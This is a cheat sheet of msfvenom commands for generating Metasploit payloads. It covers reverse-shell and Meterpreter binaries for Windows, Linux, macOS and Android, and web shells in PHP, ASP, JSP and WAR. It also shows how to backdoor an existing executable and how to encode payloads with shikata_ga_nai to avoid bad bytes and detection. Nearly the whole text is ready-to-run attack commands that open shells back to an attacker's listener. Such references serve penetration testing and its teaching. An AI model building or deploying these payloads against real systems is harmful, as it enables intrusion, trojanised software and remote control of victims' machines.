msfvenom#
MsfVenom is the Metasploit standalone payload generator. It replaces
msfpayload and msfencode.
Binaries#
# Windows
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f exe -o example.exe
$ msfvenom -p windows/meterpreter/reverse_http LHOST={IP} LPORT={##} -f exe -o example.exe
# Linux
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f elf -o example.elf
# macOS
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST={IP} LPORT={##} -f macho -o example.macho
# Android
$ msfvenom -p android/meterpreter/reverse_tcp LHOST={IP} LPORT={##} R -o example.apk
Web payloads#
$ msfvenom -p php/meterpreter_reverse_tcp LHOST={IP} LPORT={##} -f raw -o example.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f asp -o example.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={IP} LPORT={##} -f raw -o example.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={IP} LPORT={##} -f war -o example.war
Windows payloads#
$ msfvenom -l encoders # list encoders
# bind exe with payload (backdoor an exe)
$ msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} \
-f exe -o example.exe
# encoded payload, shikata_ga_nai, 3 iterations, bad byte \x00
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} \
-e x86/shikata_ga_nai -b '\x00' -i 3 -f exe -o example.exe
# combine bind + encode
$ msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} \
-e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o example.exe
macOS payloads#
$ msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o /tmp/osxt2
$ msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=443 -o pyterpreter.py
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST={IP} LPORT={##} -f macho -o example.macho